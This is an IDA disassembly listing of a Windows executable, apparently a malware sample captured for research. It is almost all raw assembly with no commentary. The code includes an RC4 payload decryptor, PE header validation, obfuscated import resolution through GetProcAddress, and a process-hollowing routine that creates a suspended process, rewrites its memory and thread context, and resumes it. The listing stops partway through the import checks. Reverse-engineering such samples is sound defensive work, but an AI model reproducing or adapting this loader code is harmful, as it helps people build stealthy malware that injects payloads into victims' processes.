;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : A50330E92D120C6A3DFD7A75A66F9644
; File Name : u:\work\a50330e92d120c6a3dfd7a75a66f9644_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00001840 ( 6208.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_401040+15�p
; sub_401190+10�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
imul esi, [esp+4+arg_4]
push edi
push esi ; dwBytes
push 0 ; uFlags
call ds:GlobalAlloc ; GlobalAlloc
mov edx, eax
mov ecx, esi
xor eax, eax
mov edi, edx
shr ecx, 2
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
pop edi
mov eax, edx
pop esi
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401030(HGLOBAL hMem)
sub_401030 proc near ; CODE XREF: sub_401650+203�p
hMem = dword ptr 4
mov eax, [esp+hMem]
push eax ; hMem
call ds:GlobalFree ; GlobalFree
retn
sub_401030 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401040 proc near ; CODE XREF: sub_401C30+E�p
; sub_401C30+41�p ...
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 108h
mov eax, [esp+108h+arg_8]
push 1
lea eax, [eax+eax*4]
shl eax, 1
push eax
call sub_401000
add esp, 8
mov [esp+108h+var_104], eax
test eax, eax
jnz short loc_40106C
add esp, 108h
retn
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401040+23�j
xor eax, eax
loc_40106E: ; CODE XREF: sub_401040+38�j
mov [esp+eax+108h+var_100], al
inc eax
cmp eax, 0FFh
jle short loc_40106E
push ebx
push ebp
mov ebp, [esp+110h+arg_0]
push esi
xor ebx, ebx
push edi
xor esi, esi
loc_401089: ; CODE XREF: sub_401040+9A�j
mov cl, [esp+esi+118h+var_100]
mov edi, ebp
mov byte ptr [esp+118h+var_108], cl
or ecx, 0FFFFFFFFh
xor eax, eax
xor edx, edx
repne scasb
not ecx
dec ecx
mov eax, esi
div ecx
mov eax, [esp+118h+var_108]
mov ecx, eax
and ecx, 0FFh
movsx edx, byte ptr [edx+ebp]
add ebx, edx
add ebx, ecx
and ebx, 800000FFh
jns short loc_4010C7
dec ebx
or ebx, 0FFFFFF00h
inc ebx
loc_4010C7: ; CODE XREF: sub_401040+7D�j
mov dl, [esp+ebx+118h+var_100]
mov [esp+esi+118h+var_100], dl
inc esi
cmp esi, 0FFh
mov [esp+ebx+118h+var_100], al
jle short loc_401089
mov ecx, [esp+118h+arg_8]
xor esi, esi
xor eax, eax
test ecx, ecx
jle loc_40117C
mov ebp, [esp+118h+arg_4]
mov ecx, [esp+118h+var_104]
sub ebp, ecx
loc_4010FC: ; CODE XREF: sub_401040+13A�j
mov ecx, eax
and ecx, 800000FFh
jns short loc_40110E
dec ecx
or ecx, 0FFFFFF00h
inc ecx
loc_40110E: ; CODE XREF: sub_401040+C4�j
mov dl, [esp+ecx+118h+var_100]
lea ecx, [esp+ecx+118h+var_100]
mov edi, edx
and edi, 0FFh
add esi, edi
and esi, 800000FFh
jns short loc_401130
dec esi
or esi, 0FFFFFF00h
inc esi
loc_401130: ; CODE XREF: sub_401040+E6�j
mov bl, [esp+esi+118h+var_100]
mov byte ptr [esp+118h+var_108], dl
mov [ecx], bl
mov [esp+esi+118h+var_100], dl
mov edx, [esp+118h+var_104]
lea edi, [eax+edx]
xor edx, edx
mov dl, [ecx]
mov ecx, [esp+118h+var_108]
and ecx, 0FFh
add edx, ecx
and edx, 800000FFh
jns short loc_401165
dec edx
or edx, 0FFFFFF00h
inc edx
loc_401165: ; CODE XREF: sub_401040+11B�j
mov dl, [esp+edx+118h+var_100]
mov bl, [edi+ebp]
mov ecx, [esp+118h+arg_8]
xor dl, bl
inc eax
mov [edi], dl
cmp eax, ecx
jl short loc_4010FC
loc_40117C: ; CODE XREF: sub_401040+A9�j
mov eax, [esp+118h+var_104]
pop edi
pop esi
pop ebp
pop ebx
add esp, 108h
retn
sub_401040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401190 proc near ; CODE XREF: start+AC�p
var_4 = byte ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
mov ebx, [esp+8+arg_4]
push esi
mov esi, ebx
push edi
push 1
shl esi, 4
push esi
call sub_401000
mov edi, eax
add esp, 8
test edi, edi
jnz short loc_4011B3
pop edi
pop esi
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4011B3: ; CODE XREF: sub_401190+1C�j
lea eax, [esp+10h+arg_4]
lea ecx, [esp+10h+var_4]
push eax
push ecx
push 2
call dword_40429C
mov edx, [esp+10h+arg_8]
mov eax, [esp+10h+arg_0]
push edx
push ebx
push eax
push esi
push edi
push 2
call dword_404288
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
retn
sub_401190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011F0 proc near ; CODE XREF: sub_401210+10�p
; sub_401210+4D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
xor edx, edx
lea eax, [eax+ecx-1]
div ecx
imul eax, ecx
retn
sub_4011F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_4012C0+60�p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_8]
push edi
mov eax, [esi+38h]
mov ecx, [esi+54h]
push eax
push ecx
call sub_4011F0
xor ebp, ebp
add esp, 8
cmp [esi+6], bp
mov ebx, eax
jbe short loc_4012A6
mov edx, [esp+10h+arg_C]
lea edi, [edx+0Ch]
loc_401239: ; CODE XREF: sub_401210+94�j
mov edx, [edi+4]
mov eax, [edi+8]
mov ecx, [esp+10h+arg_4]
add eax, edx
cmp eax, ecx
ja short loc_4012AD
mov eax, [edi]
test eax, eax
jz short loc_40127C
mov ecx, [edi-4]
test ecx, ecx
jz short loc_401269
mov edx, [esi+38h]
add ecx, eax
push edx
push ecx
call sub_4011F0
add esp, 8
mov ebx, eax
jmp short loc_401298
; ---------------------------------------------------------------------------
loc_401269: ; CODE XREF: sub_401210+44�j
mov ecx, [esi+38h]
add edx, eax
push ecx
push edx
call sub_4011F0
add esp, 8
mov ebx, eax
jmp short loc_401298
; ---------------------------------------------------------------------------
loc_40127C: ; CODE XREF: sub_401210+3D�j
mov eax, [edi-4]
cmp eax, edx
jnb short loc_401289
mov edx, [esi+38h]
push edx
jmp short loc_40128D
; ---------------------------------------------------------------------------
loc_401289: ; CODE XREF: sub_401210+71�j
mov ecx, [esi+38h]
push ecx
loc_40128D: ; CODE XREF: sub_401210+77�j
push eax
call sub_4011F0
add esp, 8
add ebx, eax
loc_401298: ; CODE XREF: sub_401210+57�j
; sub_401210+6A�j
xor edx, edx
inc ebp
mov dx, [esi+6]
add edi, 28h
cmp ebp, edx
jl short loc_401239
loc_4012A6: ; CODE XREF: sub_401210+20�j
pop edi
pop esi
mov eax, ebx
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4012AD: ; CODE XREF: sub_401210+37�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4012C0 proc near ; CODE XREF: sub_401870+25�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov ecx, [esp+arg_4]
push ebp
cmp ecx, 40h
push esi
jb loc_401449
mov eax, [esp+8+arg_0]
cmp word ptr [eax], 5A4Dh
jnz loc_401449
mov esi, [eax+3Ch]
lea edx, [esi+0F8h]
cmp ecx, edx
jl loc_401449
mov edx, [esi+eax]
add esi, eax
cmp edx, 4550h
jnz loc_401449
test byte ptr [esi+17h], 20h
jnz loc_401449
cmp word ptr [esi+14h], 0E0h
jnz loc_401449
lea ebp, [esi+0F8h]
push ebp
push esi
push ecx
push eax
call sub_401210
mov ecx, [esp+18h+arg_14]
add esp, 10h
test eax, eax
mov [ecx], eax
jz loc_401449
push ebx
push edi
push 40h
push 1000h
push eax
push 0
call dword_4042FC
mov ebx, [esp+10h+arg_10]
test eax, eax
mov [ebx], eax
jz loc_40143F
mov edi, [esi+54h]
xor ecx, ecx
mov cx, [esi+6]
test ecx, ecx
jle short loc_401378
lea esi, [ebp+14h]
loc_401366: ; CODE XREF: sub_4012C0+B6�j
mov edx, [esi]
test edx, edx
jz short loc_401372
cmp edx, edi
jnb short loc_401372
mov edi, edx
loc_401372: ; CODE XREF: sub_4012C0+AA�j
; sub_4012C0+AE�j
add esi, 28h
dec ecx
jnz short loc_401366
loc_401378: ; CODE XREF: sub_4012C0+A1�j
mov edx, [esp+10h+arg_0]
push edi
push edx
push eax
call sub_402330
mov eax, [ebx]
mov edi, [esp+1Ch+arg_8]
mov ebp, [esp+1Ch+arg_C]
mov ecx, [eax+3Ch]
add eax, ecx
mov [edi], eax
add eax, 0F8h
mov [ebp+0], eax
mov eax, [edi]
mov edx, [eax+38h]
mov eax, [eax+54h]
push edx
push eax
call sub_4011F0
mov ecx, [ebx]
mov esi, eax
add esi, ecx
mov ecx, [edi]
xor ebx, ebx
add esp, 14h
cmp [ecx+6], bx
mov [esp+10h+arg_4], ebx
jbe short loc_40143F
loc_4013C3: ; CODE XREF: sub_4012C0+17D�j
mov edx, [ebp+0]
lea eax, [ebx+edx]
mov edx, [ebx+edx+0Ch]
test edx, edx
jz short loc_4013D9
mov esi, [esp+10h+arg_10]
add edx, [esi]
mov esi, edx
loc_4013D9: ; CODE XREF: sub_4012C0+10F�j
mov edx, [eax+10h]
test edx, edx
jz short loc_401415
mov eax, [eax+14h]
mov ecx, [esp+10h+arg_0]
add eax, ecx
push edx
push eax
push esi
call sub_402330
mov ecx, [ebp+0]
mov edx, [edi]
add esp, 0Ch
lea eax, [ebx+ecx]
mov ecx, [ebx+ecx+8]
mov eax, [eax+10h]
cmp ecx, eax
jnb short loc_40140E
mov ecx, [edx+38h]
push ecx
push eax
jmp short loc_40141D
; ---------------------------------------------------------------------------
loc_40140E: ; CODE XREF: sub_4012C0+145�j
mov eax, [edx+38h]
push eax
push ecx
jmp short loc_40141D
; ---------------------------------------------------------------------------
loc_401415: ; CODE XREF: sub_4012C0+11E�j
mov ecx, [ecx+38h]
mov edx, [eax+8]
push ecx
push edx
loc_40141D: ; CODE XREF: sub_4012C0+14C�j
; sub_4012C0+153�j
call sub_4011F0
mov ecx, [edi]
add esi, eax
mov eax, [esp+18h+arg_4]
xor edx, edx
mov dx, [ecx+6]
add esp, 8
inc eax
add ebx, 28h
cmp eax, edx
mov [esp+10h+arg_4], eax
jl short loc_4013C3
loc_40143F: ; CODE XREF: sub_4012C0+90�j
; sub_4012C0+101�j
pop edi
pop ebx
pop esi
mov eax, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_401449: ; CODE XREF: sub_4012C0+9�j
; sub_4012C0+18�j ...
pop esi
xor eax, eax
pop ebp
retn
sub_4012C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401450 proc near ; CODE XREF: sub_401460+12�p
; sub_401650:loc_401707�p
mov ecx, dword_4042E0
xor eax, eax
test ecx, ecx
setnz al
retn
sub_401450 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401460(LPCSTR lpString2)
sub_401460 proc near ; CODE XREF: sub_401650+2C�p
lpString2 = dword ptr 4
push esi
push 1
push 100h
call sub_401000
add esp, 8
mov esi, eax
call sub_401450
test eax, eax
jz short loc_4014A5
push edi
mov ecx, 40h
xor eax, eax
mov edi, esi
push 100h
push esi
rep stosd
push eax
call dword_4042C0
mov eax, [esp+8+lpString2]
push eax ; lpString2
push esi ; lpString1
call ds:lstrcatA ; lstrcatA
mov eax, esi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4014A5: ; CODE XREF: sub_401460+19�j
xor eax, eax
pop esi
retn
sub_401460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4014B0 proc near ; CODE XREF: sub_401650+FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, [eax+0A0h]
test ecx, ecx
jz short loc_4014CE
mov ecx, [eax+0A4h]
test ecx, ecx
jz short loc_4014CE
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_4014CE: ; CODE XREF: sub_4014B0+C�j
; sub_4014B0+16�j
xor eax, eax
retn
sub_4014B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4014E0 proc near ; CODE XREF: sub_401650+12A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov eax, [eax+0A0h]
add eax, ecx
mov ecx, [eax+4]
mov edx, [eax]
add ecx, edx
jz short locret_401519
push esi
loc_4014FA: ; CODE XREF: sub_4014E0+36�j
lea ecx, [eax+8]
mov eax, [eax+4]
sub eax, 8
shr eax, 1
cmp eax, 1
jb short loc_40150D
lea ecx, [ecx+eax*2]
loc_40150D: ; CODE XREF: sub_4014E0+28�j
mov edx, [ecx+4]
mov esi, [ecx]
add edx, esi
mov eax, ecx
jnz short loc_4014FA
pop esi
locret_401519: ; CODE XREF: sub_4014E0+17�j
retn
sub_4014E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401520 proc near ; CODE XREF: sub_401650+CA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
push offset LibFileName ; "ntdll.dll"
xor esi, esi
call ds:LoadLibraryA ; LoadLibraryA
mov edi, eax
test edi, edi
jz short loc_401553
mov eax, [esp+8+arg_4]
mov ecx, [esp+8+arg_0]
push eax
push ecx
call dword_404294
mov esi, eax
push edi
neg esi
sbb esi, esi
inc esi
call dword_404298
loc_401553: ; CODE XREF: sub_401520+13�j
mov eax, esi
pop edi
pop esi
retn
sub_401520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401560 proc near ; CODE XREF: sub_401650+6B�p
var_74 = byte ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_44 = dword ptr -44h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_18 = dword ptr 1Ch
sub esp, 74h
push ebp
push edi
mov ecx, 11h
xor eax, eax
lea edi, [esp+7Ch+var_44]
lea edx, [esp+7Ch+var_44]
rep stosd
mov [esp+7Ch+var_70], eax
lea ecx, [esp+7Ch+var_70]
mov [esp+7Ch+var_6C], eax
push ecx
mov [esp+80h+var_68], eax
push edx
push eax
push eax
push 4
push eax
push eax
mov [esp+98h+var_64], eax
push eax
mov eax, [esp+9Ch+arg_0]
push eax
push 0
mov [esp+0A4h+var_44], 44h
call dword_4042A8
mov ebp, eax
test ebp, ebp
jz loc_401641
mov edi, [esp+7Ch+arg_8]
mov ecx, [esp+7Ch+var_70]
mov eax, [esp+7Ch+arg_C]
mov edx, [esp+7Ch+var_6C]
push ebx
mov [edi], ecx
mov ecx, [esp+80h+arg_10]
push esi
mov esi, [esp+84h+arg_4]
mov [eax], edx
mov edx, [esp+84h+var_68]
push esi
mov [ecx], edx
mov dword ptr [esi], 10007h
mov eax, [eax]
push eax
call dword_40428C
mov edx, [esi+0A4h]
mov ebx, [esp+84h+arg_14]
mov eax, [edi]
lea ecx, [esp+84h+var_74]
push ecx
push 4
add edx, 8
push ebx
push edx
push eax
call dword_4042AC
mov esi, [ebx]
mov edx, [edi]
lea ecx, [esp+84h+var_60]
push 1Ch
push ecx
push esi
push edx
call dword_4042B4
mov eax, [ebx]
sub esi, eax
mov eax, [esp+84h+arg_18]
mov [eax], esi
pop esi
pop ebx
mov eax, ebp
pop edi
pop ebp
add esp, 74h
retn
; ---------------------------------------------------------------------------
loc_401641: ; CODE XREF: sub_401560+4F�j
mov eax, ebp
pop edi
pop ebp
add esp, 74h
retn
sub_401560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401650(LPCSTR lpString2, int, int, int, int, int)
sub_401650 proc near ; CODE XREF: sub_401870+4F�p
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_228 = dword ptr -228h
var_21C = dword ptr -21Ch
lpString2 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
sub esp, 2E4h
mov ecx, [esp+2E4h+lpString2]
push ebp
push esi
mov esi, [esp+2ECh+arg_4]
push edi
mov edi, [esp+2F0h+arg_10]
mov eax, [esi+34h]
push edi
push eax
push ecx ; lpString2
mov [esp+2FCh+var_2E4], 0FFFFFFFFh
call sub_401460
mov ebp, eax
add esp, 0Ch
test ebp, ebp
jnz short loc_401698
mov eax, [esp+2F0h+var_2E4]
pop edi
pop esi
pop ebp
add esp, 2E4h
retn
; ---------------------------------------------------------------------------
loc_401698: ; CODE XREF: sub_401650+38�j
mov ecx, [esp+2F0h+arg_14]
lea edx, [esp+2F0h+var_2D0]
push ebx
lea eax, [esp+2F4h+var_2D8]
push edx
push eax
lea edx, [esp+2FCh+var_2DC]
push ecx
lea eax, [esp+300h+var_2E4]
push edx
lea ecx, [esp+304h+var_2CC]
push eax
push ecx
push ebp
call sub_401560
add esp, 1Ch
test eax, eax
jz loc_401852
mov eax, [esp+2F4h+var_2D8]
mov ecx, [esi+34h]
mov ebx, [esp+2F4h+arg_C]
cmp ecx, eax
mov [esp+2F4h+var_2E0], 0
jnz short loc_401707
mov ecx, [esp+2F4h+var_2D0]
cmp ecx, edi
jb short loc_401707
lea edx, [esp+2F4h+var_2D4]
mov [esp+2F4h+var_2E0], eax
push edx
push 40h
push ecx
push eax
mov eax, [esp+304h+var_2E4]
push eax
call dword_4042BC
jmp short loc_401782
; ---------------------------------------------------------------------------
loc_401707: ; CODE XREF: sub_401650+93�j
; sub_401650+9B�j
call sub_401450
test eax, eax
jz short loc_401782
mov ecx, [esp+2F4h+var_2D8]
mov edx, [esp+2F4h+var_2E4]
push ecx
push edx
call sub_401520
add esp, 8
test eax, eax
jz short loc_401741
mov eax, [esi+34h]
mov ecx, [esp+2F4h+var_2E4]
push 40h
push 3000h
push edi
push eax
push ecx
call dword_4042E0
mov [esp+2F4h+var_2E0], eax
loc_401741: ; CODE XREF: sub_401650+D4�j
mov eax, [esp+2F4h+var_2E0]
test eax, eax
jnz short loc_40178E
push esi
call sub_4014B0
add esp, 4
test eax, eax
jz short loc_401782
mov edx, [esp+2F4h+var_2E4]
push 40h
push 3000h
push edi
push 0
push edx
call dword_4042E0
test eax, eax
mov [esp+2F4h+var_2E0], eax
jz loc_401827
push eax
push ebx
push esi
call sub_4014E0
add esp, 0Ch
loc_401782: ; CODE XREF: sub_401650+B5�j
; sub_401650+BE�j ...
mov eax, [esp+2F4h+var_2E0]
test eax, eax
jz loc_401827
loc_40178E: ; CODE XREF: sub_401650+F7�j
mov edx, [esp+2F4h+var_228]
lea eax, [esp+2F4h+var_2D4]
push eax
mov eax, [esp+2F8h+var_2E4]
lea ecx, [esp+2F8h+var_2E0]
push 4
add edx, 8
push ecx
push edx
push eax
call dword_4042E4
mov eax, [esp+2F4h+var_2E0]
mov edx, [esp+2F4h+var_2E4]
lea ecx, [esp+2F4h+var_2D4]
mov [esi+34h], eax
push ecx
push edi
push ebx
push eax
push edx
call dword_4042E4
test eax, eax
jz short loc_401827
mov eax, [esp+2F4h+var_2E0]
mov ecx, [esp+2F4h+var_2D8]
cmp eax, ecx
mov dword ptr [esp+2F4h+var_2CC], 10007h
jnz short loc_4017F3
mov eax, [esi+28h]
mov ecx, [esi+34h]
add eax, ecx
mov [esp+2F4h+var_21C], eax
jmp short loc_4017FF
; ---------------------------------------------------------------------------
loc_4017F3: ; CODE XREF: sub_401650+190�j
mov ecx, [esi+28h]
add ecx, eax
mov [esp+2F4h+var_21C], ecx
loc_4017FF: ; CODE XREF: sub_401650+1A1�j
mov eax, [esp+2F4h+var_2DC]
lea edx, [esp+2F4h+var_2CC]
push edx
push eax
call dword_4042D8
mov ecx, [esp+2F4h+var_2DC]
push ecx
call dword_4042D0
mov edx, [esp+2F4h+var_2DC]
push edx
call dword_404290
jmp short loc_401852
; ---------------------------------------------------------------------------
loc_401827: ; CODE XREF: sub_401650+121�j
; sub_401650+138�j ...
mov eax, [esp+2F4h+var_2E4]
push 0
push eax
call dword_4042F4
mov ecx, [esp+2F4h+var_2DC]
push ecx
call dword_404290
mov edx, [esp+2F4h+var_2E4]
push edx
call dword_404290
mov [esp+2F4h+var_2E4], 0FFFFFFFFh
loc_401852: ; CODE XREF: sub_401650+75�j
; sub_401650+1D5�j
push ebp ; hMem
call sub_401030
mov eax, [esp+2F8h+var_2E4]
add esp, 4
pop ebx
pop edi
pop esi
pop ebp
add esp, 2E4h
retn
sub_401650 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401870(int, int, LPCSTR lpString2, int)
sub_401870 proc near ; CODE XREF: start+C5�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
lpString2 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 8
lea eax, [esp+8+arg_4]
lea ecx, [esp+8+arg_0]
lea edx, [esp+8+var_8]
push esi
push eax
push ecx
mov ecx, [esp+14h+arg_4]
lea eax, [esp+14h+var_4]
push edx
mov edx, [esp+18h+arg_0]
push eax
push ecx
push edx
or esi, 0FFFFFFFFh
call sub_4012C0
add esp, 18h
test eax, eax
jz short loc_4018DE
mov eax, [esp+0Ch+arg_C]
mov ecx, [esp+0Ch+arg_4]
mov edx, [esp+0Ch+arg_0]
push eax ; int
mov eax, [esp+10h+var_8]
push ecx ; int
mov ecx, [esp+14h+var_4]
push edx ; int
mov edx, [esp+18h+lpString2]
push eax ; int
push ecx ; int
push edx ; lpString2
call sub_401650
mov ecx, [esp+24h+arg_0]
add esp, 18h
mov esi, eax
mov eax, [esp+0Ch+arg_4]
push 4000h
push eax
push ecx
call dword_4042B8
loc_4018DE: ; CODE XREF: sub_401870+2F�j
mov eax, esi
pop esi
add esp, 8
retn
sub_401870 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4018F0 proc near ; CODE XREF: start+29�p
push ebx
push ebp
push esi
push edi
push offset ModuleName ; ")1}"
call ds:GetModuleHandleA ; GetModuleHandleA
mov esi, ds:LoadLibraryA
push offset aKQ ; ", k\x1Bï"
mov ebx, eax
call esi ; LoadLibraryA
push offset aO ; "&!o"
mov edi, eax
call esi ; LoadLibraryA
mov esi, ds:GetProcAddress
push offset dword_404028 ; lpProcName
push edi ; hModule
mov ebp, eax
call esi ; GetProcAddress
push offset dword_404038 ; lpProcName
push edi ; hModule
mov dword_4042FC, eax
call esi ; GetProcAddress
push offset ProcName ; lpProcName
push edi ; hModule
mov dword_4042E0, eax
call esi ; GetProcAddress
push offset dword_40405C ; lpProcName
push ebx ; hModule
mov dword_4042C0, eax
call esi ; GetProcAddress
push offset dword_404074 ; lpProcName
push edi ; hModule
mov dword_404294, eax
call esi ; GetProcAddress
push offset dword_404080 ; lpProcName
push edi ; hModule
mov dword_404298, eax
call esi ; GetProcAddress
push offset byte_404090 ; lpProcName
push edi ; hModule
mov dword_4042A8, eax
call esi ; GetProcAddress
push offset dword_4040A4 ; lpProcName
push edi ; hModule
mov dword_40428C, eax
call esi ; GetProcAddress
push offset dword_4040B8 ; lpProcName
push edi ; hModule
mov dword_4042AC, eax
call esi ; GetProcAddress
push offset dword_4040C8 ; lpProcName
push edi ; hModule
mov dword_4042B4, eax
call esi ; GetProcAddress
push offset dword_4040DC ; lpProcName
push edi ; hModule
mov dword_4042BC, eax
call esi ; GetProcAddress
push offset dword_4040F0 ; lpProcName
push edi ; hModule
mov dword_4042E4, eax
call esi ; GetProcAddress
push offset dword_404104 ; lpProcName
push edi ; hModule
mov dword_4042D8, eax
call esi ; GetProcAddress
push offset dword_404114 ; lpProcName
push edi ; hModule
mov dword_4042D0, eax
call esi ; GetProcAddress
push offset dword_404120 ; lpProcName
push edi ; hModule
mov dword_404290, eax
call esi ; GetProcAddress
push offset dword_404134 ; lpProcName
push edi ; hModule
mov dword_4042F4, eax
call esi ; GetProcAddress
push offset byte_404158 ; lpProcName
mov dword_4042B8, eax
push edi ; hModule
call esi ; GetProcAddress
push offset dword_404148 ; lpProcName
push edi ; hModule
mov dword_4042F0, eax
call esi ; GetProcAddress
push offset dword_404140 ; lpProcName
push edi ; hModule
mov dword_4042C8, eax
call esi ; GetProcAddress
push offset dword_404168 ; lpProcName
push ebx ; hModule
mov dword_4042A0, eax
call esi ; GetProcAddress
push offset dword_40417C ; lpProcName
push ebx ; hModule
mov dword_4042D4, eax
call esi ; GetProcAddress
push offset dword_404190 ; lpProcName
push ebx ; hModule
mov dword_404288, eax
call esi ; GetProcAddress
push offset dword_4041B0 ; lpProcName
push edi ; hModule
mov dword_40429C, eax
call esi ; GetProcAddress
push offset dword_4041BC ; lpProcName
push edi ; hModule
mov dword_4042C4, eax
call esi ; GetProcAddress
push offset dword_4041D8 ; lpProcName
push edi ; hModule
mov dword_4042B0, eax
call esi ; GetProcAddress
push offset byte_4041C8 ; lpProcName
push edi ; hModule
mov dword_4042F8, eax
call esi ; GetProcAddress
push offset byte_4041F8 ; lpProcName
push ebp ; hModule
mov dword_4042CC, eax
call esi ; GetProcAddress
push offset dword_404208 ; lpProcName
push ebp ; hModule
mov dword_4042E8, eax
call esi ; GetProcAddress
push offset dword_404214 ; lpProcName
push ebp ; hModule
mov dword_4042DC, eax
call esi ; GetProcAddress
push offset dword_404228 ; lpProcName
push ebp ; hModule
mov dword_4042A4, eax
call esi ; GetProcAddress
mov ecx, dword_4042FC
mov dword_4042EC, eax
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042E0
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042C0
test ecx, ecx
jz loc_401C16
mov ecx, dword_404294
test ecx, ecx
jz loc_401C16
mov ecx, dword_404298
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042A8
test ecx, ecx
jz loc_401C16
mov ecx, dword_40428C
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042AC
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042B4
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042BC
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042E4
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042D8
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042D0
test ecx, ecx
jz loc_401C16
mov ecx, dword_404290
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042F4
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042B8
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042F0
test ecx, ecx
jz loc_401C16
mov ecx, dword_4042C8
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042A0
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042D4
test ecx, ecx
jz short loc_401C16
mov ecx, dword_404288
test ecx, ecx
jz short loc_401C16
mov ecx, dword_40429C
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042C4
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042B0
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042F8
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042CC
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042E8
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042DC
test ecx, ecx
jz short loc_401C16
mov ecx, dword_4042A4
test ecx, ecx
jz short loc_401C16
test eax, eax
jz short loc_401C16
